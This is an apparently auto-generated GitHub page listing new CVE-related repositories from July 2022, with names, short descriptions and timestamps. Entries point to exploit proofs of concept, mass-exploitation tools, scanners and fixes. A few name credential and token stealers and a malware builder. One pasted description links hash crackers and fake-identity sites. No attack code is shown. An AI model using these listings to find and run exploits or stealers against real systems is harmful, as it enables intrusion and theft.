Skip to content

nullfuzz-pentest/cve_monitor

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3,129 Commits

.github/workflows

.github/workflows

 
 

web

web

 
 

.gitignore

.gitignore

 
 

README.md

README.md

 
 

cve.sqlite

cve.sqlite

 
 

main.py

main.py

 
 

mkdocs.yml

mkdocs.yml

 
 

Repository files navigation

Automatic monitor github cve using Github Actions

update time: 2022-08-01 14:26:05.262614 total: 10208

star me cve monitor Browsing through the web visitors

COMPILED : eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-08-01T14:14:40Z

no description : Blackyguy/-CVE-2022-29464 create time: 2022-08-01T07:27:29Z

no description : xpgdgit/CVE-2015-5531 create time: 2022-08-01T07:21:43Z

no description : xpgdgit/CVE-2014-3120 create time: 2022-08-01T04:39:04Z

Analaysis of cve-2016-0728 : tndud042713/cve-2016-0728 create time: 2022-07-31T18:51:15Z

PoC exploit for CVE-2017-1000251 (modified) : istanescu/CVE-2017-1000251_Exploit create time: 2022-07-31T12:17:41Z

CVE-2022-21661 exp for Elementor custom skin. : QWERTYisme/CVE-2022-21661 create time: 2022-07-31T11:53:06Z

Exploit for SpringShell. : iyamrotrix/CVE-2022-22965 create time: 2022-07-31T08:21:59Z

「💥」CVE-2022-33891 - Apache Spark Shell Command Injection : AmoloHT/CVE-2022-33891 create time: 2022-07-30T23:02:16Z

Script to exploit CVE-2018-1042 in order to do internal port scans. : UDPsycho/Moodle-CVE-2018-1042 create time: 2022-07-30T17:06:57Z

CVE 2022.07.30 : redclip44/CVE create time: 2022-07-30T17:20:08Z

Script to exploit CVE-2018-1042 in order to do internal port scans. : UDPsycho/Moodle-CVE-2018-1042 create time: 2022-07-30T16:08:50Z

Microsoft Exchange Server Spoofing Vulnerability Exploit! : 0xrobiul/CVE-2021-41349-Exploit create time: 2022-07-30T10:51:55Z

Confluence CVE-2022-26138 POC : z92g/CVE-2022-26138 create time: 2022-07-30T07:14:52Z

DistCC exploit : angelpimentell/distcc_cve_2004-2687_exploit create time: 2022-03-15T18:25:27Z

no description : Skipper7718/CVE-2022-21449-showcase create time: 2022-07-29T16:33:10Z

no description : fazaroot/cve-2021-pwnkit create time: 2022-07-29T13:12:36Z

wo ee cve-2022-2185 gitlab authenticated rce : ESUAdmin/CVE-2022-2185 create time: 2022-07-29T11:14:03Z

no description : xpgdgit/CVE-2015-1427 create time: 2022-07-29T09:14:56Z

WordPress Simple File List FileRead POC : z92g/CVE-2022-1119 create time: 2022-07-29T05:04:26Z

libSSH-Authentication-Bypass : EmmanuelCruzL/CVE-2018-10933 create time: 2022-07-28T13:49:47Z

WordPress WP_Query SQL Injection POC : z92g/CVE-2022-21661 create time: 2022-07-28T13:12:51Z

PHP CGI Argument Injection RCE : theykillmeslowly/CVE-2012-1823 create time: 2022-07-28T11:51:03Z

no description : Pwnzer0tt1/CVE-2022-36946 create time: 2022-07-28T11:22:13Z

Atlassian Confluence Server and Data Center: CVE-2022-26138 : Vulnmachines/Confluence-Question-CVE-2022-26138- create time: 2022-07-28T09:48:21Z

Apache 2.4.49-50 Remote Code Execution Exploit : khidhir-ibrahim/CVE-2021-42013 create time: 2022-07-28T09:21:50Z

Reports on post-exploitation on honeypot exploiting vulnerable wu-ftpd (CVE-2001-0550) : gilberto47831/Network-Filesystem-Forensics create time: 2022-07-28T04:52:58Z

QNAP N-Day (Probably not CVE-2020-2509) : jbaines-r7/overkill create time: 2022-07-27T19:58:40Z

警惕 一种针对红队的新型溯源手段! : fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp create time: 2022-07-27T15:48:19Z

Java classpath enumeration, focussed on CVE-2014-0043 for Apache Wicket 6.x : JJK96/JavaClasspathEnum create time: 2022-07-27T14:43:54Z

CVE-2022-* : GREENHAT7/pxplan create time: 2021-11-22T12:57:22Z

Vulnerability Polkit's pkexec : carloscast1llo/CVE-2021-4034 create time: 2022-07-27T10:15:37Z

weblogic-cve-2018-2628-exp : cscadoge/weblogic-cve-2018-2628 create time: 2022-07-27T06:10:28Z

Additional exploits for XSS in Cisco ASA devices discovered by PTSwarm : catatonicprime/CVE-2020-3580 create time: 2022-07-15T00:11:29Z

Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC. : aslitsecurity/Zimbra-CVE-2022-30333 create time: 2022-07-26T13:28:12Z

no description : nidhi7598/openssl-OpenSSL_1_1_1g_AOSP_10_r33_CVE-2022-1292 create time: 2022-07-26T11:33:10Z

no description : yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL create time: 2022-07-26T09:45:46Z

A demo for cve-2019-12735 : st9007a/CVE-2019-12735 create time: 2022-07-26T08:45:21Z

WebMin Versions <= 1.920 [CVE-2019-15107] RCE PoC : TheAlpha19/MiniExploit create time: 2022-07-26T07:38:03Z

Module for PrestaShop 1.7.X to fix CVE-2022-31181 vulnerability (Chain SQL Injection) : drkbcn/lblfixer_cve_2022_31181 create time: 2022-07-26T05:55:53Z

CVE-2021-38647 is an unauthenticated RCE vulnerability effecting the OMI agent as root. : Vulnmachines/OMIGOD_cve-2021-38647 create time: 2021-09-24T10:53:52Z

no description : ExploitCN/CVE-2018-11321 create time: 2022-07-26T02:28:16Z

no description : Walker-00/CVE-2021-22911 create time: 2022-07-25T12:36:30Z

no description : nidhi7598/frameworks_av_AOSP_10_r33_CVE-2021-0520 create time: 2022-07-25T11:57:50Z

no description : ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520 create time: 2022-07-25T11:51:11Z

Unauthenticated RCE via CVE-2022-26138 confluence : Daro1967/CVE-2022-26138-RCE create time: 2022-07-25T09:30:27Z

no description : Ziggy78/CVE-2022-26809-RCE-POC create time: 2022-07-25T08:58:46Z

Joplin CVE-2022-35131, RCE : ly1g3/Joplin-CVE-2022-35131 create time: 2022-07-25T06:25:52Z

no description : linulinu/CVE-2022-34918 create time: 2022-07-25T06:13:41Z

Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101 : MathiasReker/blm-vlun create time: 2022-07-24T21:50:13Z

CVE-2014-7169 Shell Shock : prince-stark/SHELL-SCHOCK create time: 2022-07-24T18:03:30Z

no description : merlinepedra/CVE-2022-34918-LPE-PoC create time: 2022-07-24T14:47:55Z

no description : merlinepedra25/CVE-2022-34918-LPE-PoC create time: 2022-07-24T14:47:40Z

Apache Spark RCE : llraudseppll/cve-2022-33891 create time: 2022-07-24T07:45:46Z

An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file. : bypazs/CVE-2022-32114 create time: 2022-05-29T15:25:08Z

远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。 : keven1z/CVE-2022-26134 create time: 2022-07-23T14:38:11Z

EXPLOIT FOR CVE IDRAC 8 2021 : krdsploit/DELL-IDRAC-8-EXPLOIT create time: 2022-07-23T08:55:55Z

The New Exploit there no available on metasploit framework ! : krdsploit/CVE-2002-2420 create time: 2022-07-22T21:33:26Z

no description : AkbarTrilaksana/CVE-2022-32832 create time: 2022-07-22T17:37:27Z

THE FINAL POC FOR CVE-2022-26809 TO ACHIEVE RCE : ToomArni65/CVE-2022-26809-FINAL-POC create time: 2022-07-22T17:31:21Z

Re Updating - Re Writing The 2004 CVE : krdsploit/CVE-2004 create time: 2022-07-22T13:57:03Z

Re Updated & Re Wrtiting : krdsploit/CVE-2004-TFTP create time: 2022-07-22T13:55:51Z

no description : d4rkduck/CVE-2022-0666 create time: 2022-07-22T09:38:20Z

Mitigation/fix of CVE-2021-41773 A Path Traversal And File Disclosure Vulnerability In Apache : EkamSinghWalia/Mitigation-CVE-2021-41773- create time: 2022-07-22T09:11:47Z

CVE-2022-23131漏洞批量检测与利用脚本 : 1324132494/CVE-2022-23131poc-exp-zabbix- create time: 2022-07-22T05:48:23Z

no description : 1mxml/CVE-2022-26138 create time: 2022-07-22T05:43:14Z

no description : J0hnbX/CVE-2022-30333 create time: 2022-07-22T01:14:29Z

no description : trhacknon/CVE-2022-34918-LPE-PoC create time: 2022-07-21T22:06:19Z

THE FINAL POC FOR CVE-2022-26809 TO ACHIEVE RCE : ToomArni65/CVE-2022-26809-POC create time: 2022-07-21T17:32:15Z

Proof-of-concept and write-up for the CVE-2022-32832 vulnerability patched in iOS 15.6 : Muirey03/CVE-2022-32832 create time: 2022-07-21T13:09:50Z

no description : rahul-masal/ubuntu22.04-cve2022 create time: 2022-07-21T14:47:55Z

no description : ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137 create time: 2022-07-21T11:57:43Z

Atlassian Questions Hardcoded Password (CVE-2022-26138) : alcaparra/CVE-2022-26138 create time: 2022-07-21T09:28:06Z

Detection and Remdiation of the Follina MSDT Vulnerability (CVE-2022-30190) : EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190- create time: 2022-07-21T06:49:44Z

no description : 2ntt/CVE-2022-30333 create time: 2022-07-21T06:54:26Z

no description : AkbarTrilaksana/cve-2022-33891 create time: 2022-07-20T22:52:43Z

The Hight Speed MSF Console For Metasploit Framework To Exploit CVE 2015-2523 : krdsploit/MSFu-Extentions- create time: 2022-07-20T21:02:41Z

CVE-2021-22205 检测脚本,支持getshell和命令执行 : keven1z/CVE-2021-22205 create time: 2022-07-20T16:57:57Z

no description : NeoWans/CVE-2018-19246 create time: 2022-07-20T13:06:26Z

no description : randorisec/CVE-2022-34918-LPE-PoC create time: 2022-07-19T12:46:45Z

CVE-2019-17621 DLink_RCE : Ler2sq/CVE-2019-17621 create time: 2022-07-20T09:39:36Z

vuln ejs 3.1.6 docker : miko550/CVE-2022-29078 create time: 2022-07-20T10:10:01Z

CVE-2007-2447 samba remote code execution : mr-l0n3lly/CVE-2007-2447 create time: 2022-07-20T08:11:11Z

CVE-2017-7921-EXP Hikvision camera : 201646613/CVE-2017-7921 create time: 2022-07-20T07:07:07Z

no description : Nivaskumark/packages_apps_Settings_CVE-2020-0188_A10_R33 create time: 2022-07-20T04:04:11Z

PoC for CVE-2022-33891 : west-wind/CVE-2022-33891 create time: 2022-07-19T23:16:27Z

PoC for CVE-2022-33891 : west-wind/CVE-2022-33891-POC create time: 2022-07-19T21:52:23Z

Apache Spark Shell Command Injection Vulnerability : HuskyHacks/cve-2022-33891 create time: 2022-07-19T18:52:12Z

samAccountName Spoofing (CVE-2021–42278) & Domain Controller Impersonation (CVE-2021–42287) : IAMinZoho/sAMAccountName-Spoofing create time: 2022-07-19T19:36:14Z

This script will remediate the BootHole bug identified in CVE-2020-25632 and/or CVE-2021-20233. : pauljrowland/BootHoleFix create time: 2022-07-19T18:56:51Z

cve-2022-29455 elementor wordpress plugin xss exploit : alirezasalehizadeh/cve-2022-29455 create time: 2022-07-16T15:29:26Z

no description : abhyanandsharma311099/cve2021-41073 create time: 2022-07-19T14:00:51Z

CVE–2019–8985 Netis WF2411 RCE : Ler2sq/CVE-2019-8985 create time: 2022-07-19T13:30:07Z

📃 A report about CVE-2021-44228 : vidrez/Ethical-Hacking-Report-Log4j create time: 2022-07-19T08:03:05Z

CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists. : cybersecurityresearcher/CVE-2021-44228-Mass-RCE-Log4j create time: 2022-07-19T07:13:28Z

CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime : cybersecurityresearcher/CVE-2022-26809-RCE-POC create time: 2022-07-19T07:18:45Z

Unquoted Service Path Asus GameSdk : AngeloPioAmirante/CVE-2022-35899 create time: 2022-07-18T14:06:58Z

Remote Code Execution attacks are one of the most frequent methods employed by cybercriminals to compromise susceptible computers. In the previous year, a serious zero-day vulnerability was identified in Log4j, a java program used by developers for debugging and application modification loggings. This is also a significant vulnerability that affects the so-called Ghidra reverse engineering tool. : tharindudh/Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228 create time: 2022-07-18T20:33:10Z

Verifed Proof of Concept on CVE-2022-24086 RCE : Cory65/CVE-2022-24086-POC create time: 2022-07-18T17:49:03Z

This is a revised version of MITRE's CICAT, made for use with modern (2022) ATT&CK and CVE data. : ShayanNGC/MITRE-CICAT-Revised create time: 2022-07-18T17:14:15Z

cve-2022-33891-poc : W01fh4cker/cve-2022-33891 create time: 2022-07-18T16:16:51Z

no description : rbowes-r7/unrar-cve-2022-30333-poc create time: 2022-07-15T22:29:42Z

no description : rwincey/Oracle-GoldenGate---CVE-2016-0451 create time: 2022-07-18T14:08:58Z

no description : ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138 create time: 2022-07-18T11:36:28Z

no description : ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138 create time: 2022-07-18T11:01:39Z

PoC for CVE-2022-23614 (Twig sort filter code execution) : davwwwx/CVE-2022-23614 create time: 2022-07-18T10:14:50Z

CVE-2021-36955 : JiaJinRong12138/CVE-2021-36955-EXP create time: 2022-07-18T07:08:56Z

no description : mchoudhary15/CVE-2022-22029-NFS-Server- create time: 2022-07-18T06:23:53Z

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. : Shehzadcyber/CVE-2017-7529 create time: 2022-07-18T05:14:55Z

no description : trhacknon/CVE-2022-32119 create time: 2022-07-17T19:20:51Z

nDay exploit for CVE-2021-27239 : WizardsOfTheInternet/CVE-2021-27239 create time: 2022-07-17T18:03:15Z

CVE-2022-24500 Windows SMB Unauthenticated Remote Code Execution Vulnerability : Daro1967/CVE-2022-24500-RCE create time: 2022-07-17T11:25:12Z

no description : ooooooo-q/cve-2022-32224-rails create time: 2022-07-17T04:09:03Z

no description : 5xxxxx-Y/cve-2022 create time: 2022-07-17T08:29:42Z

PoC for CVE-2022–30507 : yosef0x01/CVE-2022-30507 create time: 2022-07-16T15:55:28Z

Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS) : AngeloPioAmirante/CVE-2022-31897 create time: 2022-07-16T10:55:32Z

Zoo Management System 1.0 - Stored Cross-Site-Scripting (XSS) : AngeloPioAmirante/CVE-2022-33075 create time: 2022-07-16T10:44:52Z

cve-2022-29455 elementor wordpress plugin xss exploit : alyrezo/cve-2022-29455 create time: 2022-07-16T01:29:13Z

no description : n0v4mx/cve-2021-4034 create time: 2022-07-15T20:58:48Z

🤖 List of useful resources for pentesters and hackers. • Exploits Database: https://www.shodan.io/ http://www.exploit-db.com http://packetstormsecurity.com • Vulnerabilities Database: https://nvd.nist.gov/ http://www.secdocs.org/ https://cve.mitre.org/cve/ http://www.cvedetails.com/ https://www.kb.cert.org/vuls/ http://lwn.net/Vulnerabilities/ http://www.vulnerability-lab.com http://www.securityfocus.com/bid https://secunia.com/community/advisories/search/ http://denimgroup.com/resources-threadfix/ • Hacking Tutorials: http://www.ehacking.net/ http://www.securitytube.net/ http://www.hacking-tutorial.com/ https://www.offensive-security.com/ http://breakthesecurity.cysecurity.org/ http://www.spacerogue.net/wordpress/ https://www.youtube.com/user/Hak5Darren https://www.youtube.com/user/sansinstitute https://vimeo.com/channels/fullscopesecurity http://www.kalitutorials.net/2013/08/kali-linux.html https://www.youtube.com/c/Nahamsec https://www.youtube.com/c/NetworkChuck https://www.youtube.com/c/BittenTech https://www.youtube.com/c/LoiLiangYang https://www.youtube.com/c/DavidBombal https://www.youtube.com/c/LiveOverflow https://www.youtube.com/user/DEFCONConference https://www.youtube.com/c/TheTechCherBD https://www.youtube.com/c/SimplilearnOfficial https://www.youtube.com/c/CyberTraining365official https://en.wikibooks.org/wiki/Metasploit/VideoTutorials • Virus Scan: http://fuckingscan.me/ http://v2.scan.majyx.net/ http://nodistribute.com/ http://www.file2scan.net/ http://anubis.iseclab.org/ https://anonscanner.com/ http://virusscan.jotti.org/it https://www.virustotal.com/nl/ • Tools Download: http://insecure.org/ http://www.kitploit.com/ http://www.toolswatch.org/ http://tools.kali.org/tools-listing http://www.romhacking.net/utilities/ http://www.blackarch.org/tools.html http://www.hackersonlineclub.com/hacking-tools https://www.concise-courses.com/hacking-tools/ https://gexos.github.io/Hacking-Tools-Repository/ http://www.darknet.org.uk/category/hacking-tools/ https://pentest-tools.com/reconnaissance/google-hacking • Network Online Tools: http://bgp.he.net/ http://www.dnswatch.info/ http://www.tcpiputils.com/ http://services.ce3c.be/ciprg/ http://www.yougetsignal.com/ http://www.coffer.com/mac_find/ http://www.nirsoft.net/countryip/ http://www.sockets.com/services.htm https://t.me/thegeeksnetwork • IP Lookup: http://ip-api.com/ http://ipaddress.com http://whatstheirip.com http://www.whatismyip.com/ http://www.ip2location.com/demo http://www.my-ip-neighbors.com/ http://freegeoip.net/static/index.html http://www.ip-adress.com/ipaddresstolocation/ • Join for more - https://t.me/BengalBlackDiamond • Encrypt / Decrypt: http://crypo.in.ua/tools/ http://codebeautify.org/encrypt-decrypt http://www.yellowpipe.com/yis/tools/encrypter/ http://www.tools4noobs.com/online_tools/decrypt/ http://textmechanic.com/Encryption-Generator.html • Online Hash Crackers: http://www.cmd5.org/ http://hashcrack.in/en https://crackstation.net/ http://passcracking.com/ http://md5.rednoize.com/ http://www.hashkiller.co.uk/ http://www.md5online.org/ http://www.md5crack.com/ http://md5decryption.com/ http://www.cloudcracker.net/ https://hdb.insidepro.com/en http://www.onlinehashcrack.com/ http://www.md5this.com/index.php http://www.netmd5crack.com/cracker/ http://www.tydal.nu/article/md5-crack/ https://isc.sans.edu/tools/reversehash.html • Anonymous Test: https://ipleak.net/ https://www.dnsleaktest.com/ https://diafygi.github.io/webrtc-ips/ • Github Resources: https://github.com/backdatedbackdoor/Cyber-Security-Resources https://github.com/blackhatethicalhacking/bugbountytools-methodology https://github.com/0x4rk0/Methodology https://github.com/BugBountyResources/ • Tor check: http://5deqglhxcoy3gbx6.onion - Xenobite http://tmkloc6vhxos3nde.onion • SMS: http://receive-sms-now.com/ http://www.receivesmsonline.net/ http://www.receive-sms-online.info/ • Fake Identity: https://fakena.me/ http://www.fakenamegenerator.com/ http://names.igopaygo.com/people/fake_person আমাদের অফিশিয়াল কমিউনিটিতে যুক্ত হতে টেলিগ্রাম চ্যানেলের লিঙ্ক টি দেয়া হলো - https://t.me/BengalBlackDiamond শুভকামনা সবার জন্য। #Happy_Learning #Stay_Safe #Stay_Secure : rana3333s/rs create time: 2022-07-15T18:26:56Z

PoC for a security: potential path traversal with specific configs, if mod_dirlisting were enabled, which is not the default, this would result in listing the contents of the directory above the alias.. : iveresk/cve-2018-19052 create time: 2022-07-15T11:51:13Z

Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server. : iveresk/cve-2022-26134 create time: 2022-07-15T10:06:15Z

no description : logm1lo/CVE-2022-0848-RCE create time: 2022-07-15T06:28:21Z

CVE-2022-32119 - Arox-Unrestricted-File-Upload : JC175/CVE-2022-32119 create time: 2022-04-06T04:33:47Z

CVE-2022-32118 - Arox-XSS : JC175/CVE-2022-32118 create time: 2022-04-06T04:12:03Z

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 : bughuntar/log4j-scan create time: 2022-07-15T01:07:56Z

CVE-2021-46422_PoC : twoning/CVE-2021-46422_PoC create time: 2022-07-14T01:10:18Z

CVE-2022-26134-PoC : twoning/CVE-2022-26134-PoC create time: 2022-07-14T01:28:16Z

CVE-2022-26134-PoC : twoning/CVE-2022-26134-PoC create time: 2022-07-13T16:27:04Z

CVE_2022_26134 poc : 2212970396/CVE_2022_26134 create time: 2022-07-13T14:42:33Z

spring data mongodb remote code execution | cve-2022-22980 poc : Vulnmachines/Spring_cve-2022-22980 create time: 2022-07-13T14:07:26Z

CVE-2022-34265 Vulnerability : not-xences/CVE-2022-34265 create time: 2022-07-13T13:02:41Z

CVE-2022-22978 POC Project : aeifkz/CVE-2022-22978 create time: 2022-07-13T12:38:26Z

CVE-2022-22978 Lab Project : aeifkz/CVE-2022-22978 create time: 2022-07-13T09:32:30Z

no description : 0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736 create time: 2022-07-12T17:04:51Z

no description : nb1b3k/CVE-2022-1421 create time: 2022-07-12T14:34:48Z

no description : Lubnan-Skech/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft create time: 2022-07-12T12:38:46Z

no description : Lubnan-Skech/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022 create time: 2022-07-12T12:30:43Z

no description : Lubnan-Skech/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022 create time: 2022-07-12T12:30:21Z

no description : kmahyyg/CVE-2022-22947 create time: 2022-07-12T08:20:02Z

This is a python script that can be used with Shodan CLI to mass hunting Confluence Servers vulnerable to CVE-2022-26134 : p4b3l1t0/confusploit create time: 2022-07-12T05:34:09Z

H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 : safe3s/CVE-2022-35416 create time: 2022-07-12T04:35:49Z

PoC verification of Django vulnerability (CVE-2022-34265) : NopFault/CVE-2022-34265 create time: 2022-07-11T11:58:09Z

no description : CDACesec/CVE-2022-31901 create time: 2022-07-11T09:47:16Z

no description : CDACesec/CVE-2022-31901 create time: 2022-07-11T07:16:41Z

Mailcow CVE-2022-31138 : ly1g3/Mailcow-CVE-2022-31138 create time: 2022-07-11T06:53:24Z

no description : trhacknon/CVE-2022-33980-Apache-Commons-Configuration-RCE create time: 2022-07-10T18:29:04Z

Tatsu Plugin ZIP File add_custom_font unrestricted upload : xdx57/CVE-2021-25094 create time: 2022-07-10T17:01:43Z

S2-061/S2-062 Struts2 远程命令执行漏洞 POC&EXP : z92g/CVE-2021-31805 create time: 2022-07-10T14:48:52Z

Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024. : Exploitables/CVE-2009-4049 create time: 2022-07-10T04:16:16Z

The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection. : Exploitables/CVE-2019-18845 create time: 2022-07-10T04:19:35Z

The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request. : Exploitables/CVE-2021-27965 create time: 2022-07-10T04:22:55Z

GILANG - Exploiter for CVE-2021-25094 : TUANB4DUT/typehub-exploiter create time: 2022-07-10T02:01:11Z

Fastjson exploit : Expl0desploit/CVE-2022-25845 create time: 2022-07-09T21:56:10Z

Attacks against QUIC (CVE 2022 30591) : efchatz/QUIC-attacks create time: 2022-06-30T18:25:23Z

CVE-2022-23222, managed with Rust. : RafaelOrtizRC/CVE-2022-23222 create time: 2022-07-09T19:28:46Z

no description : deidal0s/instagram_CVE_2019 create time: 2022-07-09T15:22:36Z

Script PoC that exploits the Tentacles upload functionality of OctoBot trading bot and which leads to a remote code execution (RCE). CVE-2021-36711 : Nwqda/Sashimi-Evil-OctoBot-Tentacle create time: 2021-09-14T00:10:30Z

no description : iFreeDomain/CVE-2022-GE54JN-YH34E create time: 2022-07-09T05:33:14Z

no description : mmeza-developer/go--CVE-2018-6574 create time: 2022-07-08T22:47:22Z

Exploiting Android Vulnerability in ES File Explorer : Chethine/EsFileExplorer-CVE-2019-6447 create time: 2022-07-08T14:45:50Z

confluence rce : coskper-papa/CVE-2022-26134 create time: 2022-07-08T12:24:21Z

CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞 : tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE create time: 2022-07-08T09:25:42Z

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module. : bypazs/CVE-2022-34963 create time: 2022-06-28T11:32:28Z

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module. : bypazs/CVE-2022-34962 create time: 2022-06-28T13:18:56Z

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module. : bypazs/CVE-2022-34961 create time: 2022-06-28T13:08:40Z

no description : 9lyph/CVE-2022-29593 create time: 2022-03-04T12:03:33Z

CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) exploit code : Vikaran101/CVE-2022-31854 create time: 2022-07-07T15:33:07Z

BIGIP CVE-2020-5902 Exploit POC and automation scanning vulnerability : z3n70/CVE-2020-5902 create time: 2022-07-07T14:48:08Z

CVE-2022-0847 SUID Shell Backdoor : notl0cal/dpipe create time: 2022-03-14T03:58:21Z

no description : yoloskr/CVE-2017-9841-Scan create time: 2022-07-07T08:57:58Z

no description : aeyesec/CVE-2022-34265 create time: 2022-07-07T07:45:28Z

CVE-2022-26135 : safe3s/-CVE-2022-26135- create time: 2022-07-07T08:28:02Z

no description : KasunPriyashan/CVE-2019_6447-ES-File-Explorer-Exploitation create time: 2022-07-07T06:22:06Z

no description : Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136 create time: 2022-07-07T05:42:42Z

CVE-2021-27850 ysoserial : novysodope/CVE-2021-27850 create time: 2022-07-07T01:42:44Z

A script to change OpenSSL versions on Ubuntu to 1.1.1q to protect against CVE-2022-2097. : PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu create time: 2022-07-06T19:18:58Z

no description : infobyte/cve-2022-27255 create time: 2022-07-06T17:29:04Z

CVE-2022-32250 - Working Proof of Concept & Patch : 0dayCTF/CVE-2022-32250_PoC create time: 2022-07-06T16:27:05Z

Simple PoC-checker for CVE-2022-31749 by 1vere$k : iveresk/cve-2022-31749 create time: 2022-07-06T09:15:49Z

no description : nidhi7598/packages_apps_Bluetooth_AOSP_10_r33_CVE-2022-20133 create time: 2022-07-06T07:33:51Z

no description : nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20138 create time: 2022-07-06T06:55:45Z

CVE-2019-1405 CVE-2019-1322 : signfind/COMahawk create time: 2022-07-06T05:42:14Z

no description : z92g/CVE-2022-0543 create time: 2022-07-06T04:35:59Z

no description : f4yd4-s3c/cve-2022-26134 create time: 2022-07-06T01:27:21Z

no description : rbowes-r7/manageengine-auditad-cve-2022-28219 create time: 2022-07-01T22:40:46Z

Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135) : assetnote/jira-mobile-ssrf-exploit create time: 2022-06-24T07:55:52Z

no description : PyterSmithDarkGhost/CVE-2022-21449-I2P-TLS-POC create time: 2022-07-05T19:51:39Z

exp of CVE-2022-0847 : edr1412/Dirty-Pipe create time: 2022-07-05T19:22:50Z

no description : GULL2100/Wordpress_xss-CVE-2022-29455 create time: 2022-06-25T20:57:55Z

An eBPF detection program for CVE-2022-0847 : airbus-cert/dirtypipe-ebpf_detection create time: 2022-07-05T07:20:59Z

no description : nidhi7598/frameworks_base_AOSP10_r33_CVE-2022-20135- create time: 2022-07-05T10:15:49Z

no description : nidhi7598/Frameworks_base_AOSP10_r33__CVE-2022-20124- create time: 2022-07-05T08:59:44Z

CVE-2022-29464 Exploit : Pasch0/WSO2RCE create time: 2022-07-05T08:27:04Z

no description : Debajyoti0-0/CVE-2022-26134 create time: 2022-07-05T07:04:50Z

Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE) : nxtexploit/CVE-2022-26134 create time: 2022-07-05T04:30:42Z

TOTOLINK-A702R-V1.0.0-B20161227.1023 Directory Indexing Vulnerability : swzhouu/CVE-2020-27368 create time: 2022-07-05T03:14:52Z

SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability : swzhouu/CVE-2020-26733 create time: 2022-07-05T03:13:42Z

SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session : swzhouu/CVE-2020-26732 create time: 2022-07-05T03:11:54Z

EXP for Spring4Shell(CVE-2022-22965) : D1mang/Spring4Shell-CVE-2022-22965 create time: 2022-07-05T03:03:31Z

no description : TheL1ghtVn/CVE-2022-30333-PoC create time: 2022-07-05T02:35:12Z

no description : trhacknon/CVE-2022-22965 create time: 2022-07-05T02:30:29Z

no description : MuallimNaci/CVE-2022-30887 create time: 2022-07-04T19:24:56Z

Atlassian, CVE-2022-26134 An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vulnerability. : r1skkam/TryHackMe-Atlassian-CVE-2022-26134 create time: 2022-07-04T15:00:21Z

Fuzzing, visualization and exploit of sudo vulnerability CVE-2021-3156 : FrancescoMarchiori/CVE-2021-3156 create time: 2022-07-04T13:55:24Z

Apache Solr RCE检测脚本 (CVE-2017-12629) : 77Huan/-Wiki create time: 2022-07-04T13:14:36Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142 create time: 2022-07-04T12:16:05Z

no description : nidhi7598/linux-4.19.72_CVE-2022-30594 create time: 2022-07-04T10:01:05Z

metasploit and python module for CVE-2022-26809 windows rpc rce via smb 445 : Ziggy78/CVE-2022-26809-RCE create time: 2022-07-04T09:22:09Z

CVE-2022-1388, bypassing iControl REST authentication : jbharucha05/CVE-2022-1388 create time: 2022-07-04T06:31:56Z

CVE-2022-30929 POC : AgainstTheLight/CVE-2022-30929 create time: 2022-07-04T05:36:18Z

